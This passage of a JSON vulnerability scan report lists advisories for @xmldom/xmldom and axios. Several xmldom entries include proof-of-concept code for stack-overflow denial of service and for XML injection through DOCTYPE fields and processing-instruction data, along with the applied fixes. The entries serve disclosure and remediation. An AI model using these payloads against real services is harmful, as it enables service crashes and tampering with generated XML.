`isEqualNode` | [`lib/dom.js:1120`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L1120) | `Node.prototype.isEqualNode(other)` | ~10,000 levels |\n\nBoth active branches (`main` and `release-0.8.x`) are identically affected. The unscoped `xmldom`\npackage (≤ 0.6.0) carries the same recursive patterns from its initial commit.\n\n### Browser behavior\n\nTested with Chromium 147 (Playwright headless). Chromium's native C++ implementations of all\nseven DOM methods are **iterative** — they traverse the DOM without consuming JS call stack frames.\nAll seven succeed at depths up to 20,000 without any crash.\n\nWhen `@xmldom/xmldom` is bundled and run in a browser context the same recursive JS code executes\nunder the browser's V8 stack limit (~12,000–13,000 frames). The crash thresholds are similar to\nthose observed on Node.js 18 (~5,000 for `serializeToString`, ~10,000 for the remaining six).\n\nThe vulnerability is specific to xmldom's pure-JavaScript recursive implementation, not an\ninherent property of the DOM operations.\n\n---\n\n## PoC\n\n### `normalize()` (from @praveen-kv report, 2026-04-05)\n\n```js\nconst { DOMParser } = require('@xmldom/xmldom');\n\nfunction generateNestedXML(depth) {\n return '\u003croot\u003e' + '\u003ca\u003e'.repeat(depth) + 'text' + '\u003c/a\u003e'.repeat(depth) + '\u003c/root\u003e';\n}\n\nconst doc = new DOMParser().parseFromString(generateNestedXML(10000), 'text/xml');\ndoc.documentElement.normalize();\n// RangeError: Maximum call stack size exceeded\n```\n\n### `XMLSerializer.serializeToString()` (from GHSA-2v35-w6hq-6mfw)\n\n```js\nconst { DOMParser, XMLSerializer } = require('@xmldom/xmldom');\n\nconst depth = 5000;\nconst xml = '\u003ca\u003e'.repeat(depth) + '\u003c/a\u003e'.repeat(depth);\nconst doc = new DOMParser().parseFromString(xml, 'text/xml');\nnew XMLSerializer().serializeToString(doc);\n// RangeError: Maximum call stack size exceeded\n```\n\nThe other methods have been verified using similar pocs.\n\n---\n\n## Impact\n\nAny service that accepts attacker-controlled XML and subsequently calls any of the seven affected\nDOM operations can be forced into a reliable denial of service with a single crafted payload.\n\nThe immediate result is an uncaught `RangeError` and failed request processing. In deployments\nwhere uncaught exceptions terminate the worker or process, the impact can extend beyond a single\nrequest and disrupt service availability more broadly.\n\nNo authentication, special options, or invalid XML is required. A valid, deeply nested XML\ndocument is enough.\n\n---\n\n## Disclosure\n\nThe `normalize()` vector was publicly disclosed at 2026-04-06T11:25:07Z via\n[xmldom/xmldom#987](https://github.com/xmldom/xmldom/pull/987) (closed without merge).\n`serializeToString()` and the five additional recursive entry points were not mentioned in that PR.\n\n---\n\n## Fix Applied\n\nAll seven affected traversals have been converted from recursive to iterative implementations, eliminating call-stack consumption on deep trees.\n\n### `walkDOM` utility\n\nA new `walkDOM(node, context, callbacks)` utility is introduced. It traverses the subtree rooted at `node` in depth-first order using an explicit JavaScript array as a stack, consuming heap memory instead of call-stack frames. `context` is an arbitrary value threaded through the walk — each `callbacks.enter(node, context)` call returns the context to pass to that node's children, enabling per-branch state (e.g. namespace snapshots in the serializer). `callbacks.exit(node, context)` (optional) is called in post-order after all children have been visited.\n\nThe following six operations are re-implemented on top of `walkDOM`:\n\n| Operation | Public entry point(s) |\n|---|---|\n| `_visitNode` helper | `getElementsByTagName()`, `getElementsByTagNameNS()`, `getElementsByClassName()`, `getElementById()` |\n| `getTextContent` inner function | `node.textContent` getter |\n| `cloneNode` module function | `Node.prototype.cloneNode(true)` |\n| `importNode` module function | `Document.prototype.importNode(node, true)` |\n| `serializeToString` worker | `XMLSerializer.prototype.serializeToString()`, `Node.prototype.toString()`, `NodeList.prototype.toString()` |\n| `normalize` | `Node.prototype.normalize()` |\n\n`normalize` uses `walkDOM` with a `null` context and an `enter` callback that merges adjacent Text children of the current node before `walkDOM` reads and queues those children — so the surviving post-merge children are what the walker descends into.\n\n### Custom iterative loop for `isEqualNode`\n\nOne function cannot use `walkDOM`:\n\n**`Node.prototype.isEqualNode(other)`** (0.9.x only; absent from 0.8.x) compares two trees in parallel. It maintains an explicit stack of `{node, other}` node pairs — one node from each tree — which cannot be expressed with `walkDOM`'s single-tree visitor.\n\n### After the fix\n\nAll seven entry points succeed on trees of arbitrary depth without throwing `RangeError`. The original PoCs still demonstrate the vulnerability on unpatched versions and confirm the fix on patched versions.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 } }, "References": [ "https://github.com/xmldom/xmldom", "https://github.com/xmldom/xmldom/commit/17678a2a73ecbd1a2da90f3d47dc23da9cef81aa", "https://github.com/xmldom/xmldom/commit/291257493cb0eb6980eda83b162a9c4e6d7d2597", "https://github.com/xmldom/xmldom/commit/2d6d6916ed8a4c223db1f6d7560ab4544c465b0f", "https://github.com/xmldom/xmldom/commit/430357c7b6333108856e917bf2367afe5ceb6f8a", "https://github.com/xmldom/xmldom/commit/4845ef109221df0890825de2822fbe77afba3afe", "https://github.com/xmldom/xmldom/commit/8834218c85ac2a4d757b9587c9028e67c2f7b6c3", "https://github.com/xmldom/xmldom/commit/8b7cfd1491314abdc347261921d7334ff15f7112", "https://github.com/xmldom/xmldom/commit/b0620383abc1df067f3ce1014c43ae1bc1161eeb", "https://github.com/xmldom/xmldom/commit/e6edcab6bef5bcdba0b220bb35442aa72f452b84", "https://github.com/xmldom/xmldom/releases/tag/0.8.13", "https://github.com/xmldom/xmldom/releases/tag/0.9.10", "https://github.com/xmldom/xmldom/security/advisories/GHSA-2v35-w6hq-6mfw" ] }, { "VulnerabilityID": "CVE-2026-41674", "VendorIDs": [ "GHSA-f6ww-3ggp-fr8h" ], "PkgID": "@xmldom/xmldom@0.8.11", "PkgName": "@xmldom/xmldom", "PkgIdentifier": { "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", "UID": "df38f0b8448f89b9" }, "InstalledVersion": "0.8.11", "FixedVersion": "0.8.13, 0.9.10", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41674", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:fc50e1e35dd65f5be8c89601e405570ce7b09d9658517658355ccfee71754d1d", "Title": "xmldom has XML injection through unvalidated DocumentType serialization", "Description": "## Summary\n\nThe package serializes `DocumentType` node fields (`internalSubset`, `publicId`, `systemId`) verbatim\nwithout any escaping or validation. When these fields are set programmatically to attacker-controlled\nstrings, `XMLSerializer.serializeToString` can produce output where the DOCTYPE declaration is\nterminated early and arbitrary markup appears outside it.\n\n---\n\n## Details\n\n`DOMImplementation.createDocumentType(qualifiedName, publicId, systemId, internalSubset)` validates\nonly `qualifiedName` against the XML QName production. The remaining three arguments are stored\nas-is with no validation.\n\nThe XMLSerializer emits `DocumentType` nodes as:\n\n```\n\u003c!DOCTYPE name[ PUBLIC pubid][ SYSTEM sysid][ [internalSubset]]\u003e\n```\n\nAll fields are pushed into the output buffer verbatim — no escaping, no quoting added.\n\n**`internalSubset` injection:** The serializer wraps `internalSubset` with ` [` and `]`. A value\ncontaining `]\u003e` closes the internal subset and the DOCTYPE declaration at the injection point.\nAny content after `]\u003e` in `internalSubset` appears outside the DOCTYPE in the serialized output as\nraw XML markup. Reported by @TharVid (GHSA-f6ww-3ggp-fr8h). Affected: `@xmldom/xmldom` ≥ 0.9.0\nvia `createDocumentType` API; 0.8.x only via direct property write.\n\n**`publicId` injection:** The serializer emits `publicId` verbatim after `PUBLIC` with no\nquoting added. A value containing an injected system identifier (e.g.,\n`\"pubid\" SYSTEM \"evil\"`) breaks the intended quoting context, injecting a fake SYSTEM entry\ninto the serialized DOCTYPE declaration. Identified during internal security research. Affected:\nboth branches, all versions back to 0.1.0.\n\n**`systemId` injection:** The serializer emits `systemId` verbatim. A value containing `\u003e`\nterminates the DOCTYPE declaration early; content after `\u003e` appears as raw XML markup outside\nthe DOCTYPE context. Identified during internal security research. Affected: both branches, all\nversions back to 0.1.0.\n\nThe parse path is safe: the SAX parser enforces the `PubidLiteral` and `SystemLiteral` grammar\nproductions, which exclude the relevant characters, and the internal subset parser only accepts a\nsubset it can structurally validate. The vulnerability is reachable only through programmatic\n`createDocumentType` calls with attacker-controlled arguments.\n\n---\n\n## Affected code\n\n**`lib/dom.js` — `createDocumentType` (lines 898–910):**\n\n```js\ncreateDocumentType: function (qualifiedName, publicId, systemId, internalSubset) {\n validateQualifiedName(qualifiedName); // only qualifiedName is validated\n var node = new DocumentType(PDC);\n node.name = qualifiedName;\n node.nodeName = qualifiedName;\n node.publicId = publicId || ''; // stored verbatim\n node.systemId = systemId || ''; // stored verbatim\n node.internalSubset = internalSubset || ''; // stored verbatim\n node.childNodes = new NodeList();\n return node;\n},\n```\n\n**`lib/dom.js` — serializer DOCTYPE case (lines 2948–2964):**\n\n```js\ncase DOCUMENT_TYPE_NODE:\n var pubid = node.publicId;\n var sysid = node.systemId;\n buf.push(g.DOCTYPE_DECL_START, ' ', node.name);\n if (pubid) {\n buf.push(' ', g.PUBLIC, ' ', pubid);\n if (sysid \u0026\u0026 sysid !== '.') {\n buf.push(' ', sysid);\n }\n } else if (sysid \u0026\u0026 sysid !== '.') {\n buf.push(' ', g.SYSTEM, ' ', sysid);\n }\n if (node.internalSubset) {\n buf.push(' [', node.internalSubset, ']'); // internalSubset emitted verbatim\n }\n buf.push('\u003e');\n return;\n```\n\n---\n\n## PoC\n\n### internalSubset injection\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n 'root',\n '',\n '',\n ']\u003e\u003cinjected/\u003e\u003c![CDATA['\n);\nconst doc = impl.createDocument(null, 'root', doctype);\nconst xml = new XMLSerializer().serializeToString(doc);\nconsole.log(xml);\n// \u003c!DOCTYPE root []\u003e\u003cinjected/\u003e\u003c![CDATA[]\u003e\u003croot/\u003e\n// ^^^^^^^^^^ injected element outside DOCTYPE\n```\n\n### publicId quoting context break\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n 'root',\n '\"injected PUBLIC_ID\" SYSTEM \"evil\"',\n '',\n ''\n);\nconst doc = impl.createDocument(null, 'root', doctype);\nconsole.log(new XMLSerializer().serializeToString(doc));\n// \u003c!DOCTYPE root PUBLIC \"injected PUBLIC_ID\" SYSTEM \"evil\"\u003e\u003croot/\u003e\n// quoting context broken — SYSTEM entry injected\n```\n\n### systemId injection\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n 'root',\n '',\n '\"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e',\n ''\n);\nconst doc = impl.createDocument(null, 'root', doctype);\nconsole.log(new XMLSerializer().serializeToString(doc));\n// \u003c!DOCTYPE root SYSTEM \"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e\u003e\u003croot/\u003e\n// \u003e in sysid closes DOCTYPE early; \u003cinjected/\u003e appears as sibling element\n```\n\n---\n\n## Impact\n\nAn application that programmatically constructs `DocumentType` nodes from user-controlled data and\nthen serializes the document can emit a DOCTYPE declaration where the internal subset is closed\nearly or where injected SYSTEM entities or other declarations appear in the serialized output.\n\nDownstream XML parsers that re-parse the serialized output and expand entities from the injected\nDOCTYPE declarations may be susceptible to XXE-class attacks if they enable entity expansion.\n\n---\n\n## Fix Applied\n\n\u003e **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain\n\u003e vulnerable unless `{ requireWellFormed: true }` is explicitly passed. Applications that pass\n\u003e untrusted data to `createDocumentType()` or write untrusted values directly to a\n\u003e `DocumentType` node's `publicId`, `systemId`, or `internalSubset` properties should audit\n\u003e all `serializeToString()` call sites and add the option.\n\n`XMLSerializer.serializeToString()` now accepts an options object as a second argument. When `{ requireWellFormed: true }` is passed, the serializer validates the `DocumentType` node's `publicId`, `systemId`, and `internalSubset` fields before emitting the DOCTYPE declaration and throws `InvalidStateError` if any field contains an injection sequence:\n\n- **`publicId`**: throws if non-empty and does not match the XML `PubidLiteral` production (XML 1.0 [12])\n- **`systemId`**: throws if non-empty and does not match the XML `SystemLiteral` production (XML 1.0 [11])\n- **`internalSubset`**: throws if it contains `]\u003e` (which closes the internal subset and DOCTYPE declaration early)\n\nAll three checks apply regardless of how the invalid value entered the node — whether via `createDocumentType` arguments or a subsequent direct property write.\n\n### PoC — fixed path\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\nconst impl = new DOMImplementation();\n\n// internalSubset injection\nconst dt1 = impl.createDocumentType('root', '', '', ']\u003e\u003cinjected/\u003e\u003c![CDATA[');\nconst doc1 = impl.createDocument(null, 'root', dt1);\n\n// Default (unchanged): verbatim — injection present\nconsole.log(new XMLSerializer().serializeToString(doc1));\n// \u003c!DOCTYPE root []\u003e\u003cinjected/\u003e\u003c![CDATA[]\u003e\u003croot/\u003e\n\n// Opt-in guard: throws InvalidStateError\ntry {\n new XMLSerializer().serializeToString(doc1, { requireWellFormed: true });\n} catch (e) {\n console.log(e.name, e.message);\n // InvalidStateError: DocumentType internalSubset contains \"]\u003e\"\n}\n```\n\nThe guard also covers post-creation property writes:\n\n```js\nconst dt2 = impl.createDocumentType('root', '', '');\ndt2.systemId = '\"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e';\nconst doc2 = impl.createDocument(null, 'root', dt2);\nnew XMLSerializer().serializeToString(doc2, { requireWellFormed: true });\n// InvalidStateError: DocumentType systemId is not a valid SystemLiteral\n```\n\n### Why the default stays verbatim\n\nThe W3C DOM Parsing and Serialization spec §3.2.1.3 defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the spec permits verbatim serialization of DOCTYPE fields. Unconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in `requireWellFormed: true` flag allows applications that require injection safety to enable strict mode without breaking existing deployments.\n\n### Residual limitation\n\n`createDocumentType(qualifiedName, publicId, systemId[, internalSubset])` does not validate `publicId`, `systemId`, or `internalSubset` at creation time. This creation-time validation is a breaking change and is deferred to a future breaking release.\n\nWhen the default serialization path is used (without `requireWellFormed: true`), all three fields are still emitted verbatim. Applications that do not pass `requireWellFormed: true` remain exposed.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", "V40Score": 8.7 } }, "References": [ "https://github.com/xmldom/xmldom", "https://github.com/xmldom/xmldom/commit/372008f9ae0e20fd69f761c7b79e202598267314", "https://github.com/xmldom/xmldom/releases/tag/0.8.13", "https://github.com/xmldom/xmldom/releases/tag/0.9.10", "https://github.com/xmldom/xmldom/security/advisories/GHSA-f6ww-3ggp-fr8h" ] }, { "VulnerabilityID": "CVE-2026-41675", "VendorIDs": [ "GHSA-x6wf-f3px-wcqx" ], "PkgID": "@xmldom/xmldom@0.8.11", "PkgName": "@xmldom/xmldom", "PkgIdentifier": { "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", "UID": "df38f0b8448f89b9" }, "InstalledVersion": "0.8.11", "FixedVersion": "0.8.13, 0.9.10", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41675", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:a441b647fe2791b85e544ceacc3ca3e0f2c971eb0f090e16f14acaabdddb70d0", "Title": "xmldom has XML node injection through unvalidated processing instruction serialization", "Description": "## Summary\n\nThe package allows attacker-controlled processing instruction data to be serialized into XML without validating or neutralizing the PI-closing sequence `?\u003e`. As a result, an attacker can terminate the processing instruction early and inject arbitrary XML nodes into the serialized output.\n\n---\n\n## Details\n\nThe issue is in the DOM construction and serialization flow for processing instruction nodes.\n\nWhen `createProcessingInstruction(target, data)` is called, the supplied `data` string is stored directly on the node without validation. Later, when the document is serialized, the serializer writes PI nodes by concatenating `\u003c?`, the target, a space, `node.data`, and `?\u003e` directly.\n\nThat behavior is unsafe because processing instructions are a syntax-sensitive context. The closing delimiter `?\u003e` terminates the PI. If attacker-controlled input contains `?\u003e`, the serializer does not preserve it as literal PI content. Instead, it emits output where the remainder of the payload is treated as live XML markup.\n\nThe same class of vulnerability was previously addressed for CDATA sections (GHSA-wh4c-j3r5-mjhp / CVE-2026-34601), where `]]\u003e` in CDATA data was handled by splitting. The serializer applies no equivalent protection to processing instruction data.\n\n---\n\n## Affected code\n\n**`lib/dom.js` — `createProcessingInstruction` (lines 2240–2246):**\n\n```js\ncreateProcessingInstruction: function (target, data) {\n var node = new ProcessingInstruction(PDC);\n node.ownerDocument = this;\n node.childNodes = new NodeList();\n node.nodeName = node.target = target;\n node.nodeValue = node.data = data;\n return node;\n},\n```\n\nNo validation is performed on `data`. Any string including `?\u003e` is stored as-is.\n\n**`lib/dom.js` — serializer PI case (line 2966):**\n\n```js\ncase PROCESSING_INSTRUCTION_NODE:\n return buf.push('\u003c?', node.target, ' ', node.data, '?\u003e');\n```\n\n`node.data` is emitted verbatim. If it contains `?\u003e`, that sequence terminates the PI in the output\nstream and the remainder appears as active XML markup.\n\n**Contrast — CDATA (line 2945, patched):**\n\n```js\ncase CDATA_SECTION_NODE:\n return buf.push(g.CDATA_START, node.data.replace(/]]\u003e/g, ']]]]\u003e\u003c![CDATA[\u003e'), g.CDATA_END);\n```\n\n---\n\n## PoC\n\n### Minimal (from @tlsbollei report, 2026-04-01)\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst doc = new DOMImplementation().createDocument(null, 'r', null);\ndoc.documentElement.appendChild(\n doc.createProcessingInstruction('a', '?\u003e\u003cz/\u003e\u003c?q ')\n);\nconsole.log(new XMLSerializer().serializeToString(doc));\n// \u003cr\u003e\u003c?a ?\u003e\u003cz/\u003e\u003c?q ?\u003e\u003c/r\u003e\n// ^^^^ injected \u003cz/\u003e element is active markup\n```\n\n### With re-parse verification (from @tlsbollei report)\n\n```js\nconst assert = require('assert');\nconst { DOMParser, XMLSerializer } = require('@xmldom/xmldom');\n\nconst doc = new DOMParser().parseFromString('\u003cr/\u003e', 'application/xml');\ndoc.documentElement.appendChild(doc.createProcessingInstruction('a', '?\u003e\u003cz/\u003e\u003c?q '));\nconst xml = new XMLSerializer().serializeToString(doc);\nassert.strictEqual(new DOMParser().parseFromString(xml, 'application/xml')\n .getElementsByTagName('z').length, 1); // passes — z is a real element\n```\n\n---\n\n## Impact\n\nAn application that uses the package to build XML from untrusted input can be made to emit attacker-controlled elements outside the intended PI boundary. That allows the attacker to alter the meaning and structure of generated XML documents.\n\nIn practice, this can affect any workflow that generates XML and then stores it, forwards it, signs it, or hands it to another parser. Realistic targets include XML-based configuration, policy documents, and message formats where downstream consumers trust the serialized structure.\n\nAs noted by @tlsbollei: this is the same delimiter-driven XML injection bug class previously addressed by GHSA-wh4c-j3r5-mjhp for `createCDATASection()`. Fixing CDATA while leaving PI creation and PI serialization unguarded leaves the same standards-constrained issue open for another node type.\n\n---\n\n## Disclosure\n\nThis vulnerability was publicly disclosed at 2026-04-06T11:25:07Z via\n[xmldom/xmldom#987](https://github.com/xmldom/xmldom/pull/987), which was subsequently closed\nwithout being merged.\n\n---\n\n## Fix Applied\n\n\u003e **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain\n\u003e vulnerable unless `{ requireWellFormed: true }` is explicitly passed. Applications that pass\n\u003e untrusted data to `createProcessingInstruction()` or mutate PI nodes with untrusted input\n\u003e (via `.data =` or `CharacterData` mutation methods) should audit all `serializeToString()`\n\u003e call sites and add the option.\n\n`XMLSerializer.serializeToString()` now accepts an options object as a second argument. When `{ requireWellFormed: true }` is passed, the serializer throws `InvalidStateError` before emitting any ProcessingInstruction node whose `.data` contains `?\u003e`. This check applies regardless of how `?\u003e` entered the node — whether via `createProcessingInstruction` directly or a subsequent mutation (`.data =`, `CharacterData` methods).\n\nOn `@xmldom/xmldom` ≥ 0.9.10, the serializer additionally applies the full W3C DOM Parsing §3.2.1.7 checks when `requireWellFormed: true`:\n\n1. **Target check**: throws `InvalidStateError` if the PI target contains a `:` character or is an ASCII case-insensitive match for `\"xml\"`.\n2. **Data Char check**: throws `InvalidStateError` if the PI data contains characters outside the XML Char production.\n3. **Data sequence check**: throws `InvalidStateError` if the PI data contains `?\u003e`.\n\nOn `@xmldom/xmldom` ≥ 0.8.13 (LTS), only the `?\u003e` data check (check 3) is applied. The target and XML Char checks are not included in the LTS fix.\n\n### PoC — fixed path\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst doc = new DOMImplementation().createDocument(null, 'r', null);\ndoc.documentElement.appendChild(doc.createProcessingInstruction('a', '?\u003e\u003cz/\u003e\u003c?q '));\n\n// Default (unchanged): verbatim — injection present\nconst unsafe = new XMLSerializer().serializeToString(doc);\nconsole.log(unsafe);\n// \u003cr\u003e\u003c?a ?\u003e\u003cz/\u003e\u003c?q ?\u003e\u003c/r\u003e\n\n// Opt-in guard: throws InvalidStateError before serializing\ntry {\n new XMLSerializer().serializeToString(doc, { requireWellFormed: true });\n} catch (e) {\n console.log(e.name, e.message);\n // InvalidStateError: The ProcessingInstruction data contains \"?\u003e\"\n}\n```\n\nThe guard catches `?\u003e` regardless of when it was introduced:\n\n```js\n// Post-creation mutation: also caught at serialization time\nconst pi = doc.createProcessingInstruction('target', 'safe data');\ndoc.documentElement.appendChild(pi);\npi.data = 'safe?\u003e\u003cinjected/\u003e';\nnew XMLSerializer().serializeToString(doc, { requireWellFormed: true });\n// InvalidStateError: The ProcessingInstruction data contains \"?\u003e\"\n```\n\n### Why the default stays verbatim\n\nThe W3C DOM Parsing and Serialization spec §3.2.1.3 defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the spec explicitly permits serializing PI data verbatim. This matches browser behavior: Chrome, Firefox, and Safari all emit `?\u003e` in PI data verbatim by default without error.\n\nUnconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in `requireWellFormed: true` flag allows applications that require injection safety to enable strict mode without breaking existing code.\n\n### Residual limitation\n\n`createProcessingInstruction(target, data)` does not validate `data` at creation time. The WHATWG DOM spec (§4.5 step 2) mandates an `InvalidCharacterError` when `data` contains `?\u003e`; enforcing this check unconditionally at creation time is a breaking change and is deferred to a future breaking release.\n\nWhen the default serialization path is used (without `requireWellFormed: true`), PI data containing `?\u003e` is still emitted verbatim. Applications that do not pass `requireWellFormed: true` remain exposed.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", "V40Score": 8.7 } }, "References": [ "https://github.com/xmldom/xmldom", "https://github.com/xmldom/xmldom/commit/7207a4b0e0bcc228868075ed991665ef9f73b1c2", "https://github.com/xmldom/xmldom/releases/tag/0.8.13", "https://github.com/xmldom/xmldom/releases/tag/0.9.10", "https://github.com/xmldom/xmldom/security/advisories/GHSA-x6wf-f3px-wcqx" ] }, { "VulnerabilityID": "CVE-2026-25639", "VendorIDs": [ "GHSA-43fc-jf86-j433" ], "PkgID": "axios@1.12.2", "PkgName": "axios", "PkgIdentifier": { "PURL": "pkg:npm/axios@1.12.2", "UID": "cc6941597751af1b" }, "InstalledVersion": "1.12.2", "FixedVersion": "1.13.5, 0.30.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-25639", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:8a9b3ffe94126ca1089add94ab65b9a3b1d160c7ba38796c89ac6eaf174043ac", "Title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig", "Description": "Axios is a promise based HTTP client for the browser and Node.js. Prior to versions 0.30.3 and 1.13.5, the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service. This vulnerability is fixed in versions 0.30.3 and 1.13.5.", "Severity": "HIGH", "CweIDs": [ "CWE-754" ], "VendorSeverity": { "ghsa": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-25639", "https://github.com/axios/axios", "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57", "https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e", "https://github.com/axios/axios/pull/7369", "https://github.com/axios/axios/pull/7388", "https://github.com/axios/axios/releases/tag/v0.30.3", "https://github.com/axios/axios/releases/tag/v1.13.5", "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433", "https://nvd.nist.gov/vuln/detail/CVE-2026-25639", "https://www.cve.org/CVERecord?id=CVE-2026-25639" ], "PublishedDate": "2026-02-09T21:15:49.01Z", "LastModifiedDate": "2026-02-18T18:24:34.12Z" }, { "VulnerabilityID": "CVE-2025-62718", "VendorIDs": [ "GHSA-3p68-rc4w-qgx5" ], "PkgID": "axios@1.12.2", "PkgName": "axios", "PkgIdentifier": { "PURL": "pkg:npm/axios@1.12.2", "UID": "cc6941597751af1b" }, "InstalledVersion": "1.12.2", "FixedVersion": "1.15.0, 0.31.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-62718", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:fdf3e7211b8b024d78328d488d0363c4f2f638c04fe9e074e30c3a89f41ed614", "Title": "axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization", "Description": "Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.31.0, Axios does not correctly handle hostname normalization when checking NO_PROXY rules. Requests to loopback addresses like localhost. (with a trailing dot) or [::1] (IPv6 literal) skip NO_PROXY matching and go through the configured proxy. This goes against what developers expect and lets attackers force requests through a proxy, even if NO_PROXY is set up to protect loopback or internal services. This issue leads to the possibility of proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive loopback or internal services despite the configured protections. This vulnerability is fixed in 1.15.0 and 0.31.0.", "Severity": "MEDIUM", "CweIDs": [ "CWE-441", "CWE-918" ], "VendorSeverity": { "ghsa": 2, "nvd": 4, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N", "V3Score": 4.8, "V40Score": 6.3 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L", "V3Score": 9.9 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L", "V3Score": 7 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-62718", "https://datatracker.ietf.org/doc/html/rfc1034#section-3.1", "https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2", "https://github.com/axios/axios", "https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c", "https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df", "https://github.com/axios/axios/pull/10661", "https://github.com/axios/axios/pull/10688", "https://github.com/axios/axios/releases/tag/v0.31.0", "https://github.com/axios/axios/releases/tag/v1.15.0", "https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5", "https://nvd.nist.gov/vuln/detail/CVE-2025-62718", "https://www.cve.org/CVERecord?id=CVE-2025-62718" ], "PublishedDate": "2026-04-09T15:16:08.65Z", "LastModifiedDate": "2026-04-16T19:16:33.063Z" }, { "VulnerabilityID": "CVE-2026-40175", "VendorIDs": [ "GHSA-fvcv-3m26-pcqx" ], "PkgID": "axios@1.12.2", "PkgName": "axios", "PkgIdentifier": { "PURL": "pkg:npm/axios@1.12.2", "UID": "cc6941597751af1b" }, "InstalledVersion": "1.12.2", "FixedVersion": "1.15.0, 0.31.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-40175", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:8b6246bb95c633a8b5c2a88cf15df3262578ac7e91e25370bde54270fed967f1", "Title": "axios: Axios: Remote Code Execution via Prototype Pollution escalation", "Description": "Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.3.1, the Axios library is vulnerable to a specific \"Gadget\" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code Execution (RCE) or Full Cloud Compromise (via AWS IMDSv2 bypass). This vulnerability is fixed in 1.15.0 and 0.3.1.", 